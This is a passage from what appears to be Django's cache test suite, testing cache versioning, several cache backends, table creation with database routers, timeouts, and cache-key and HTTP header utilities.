self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(TestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
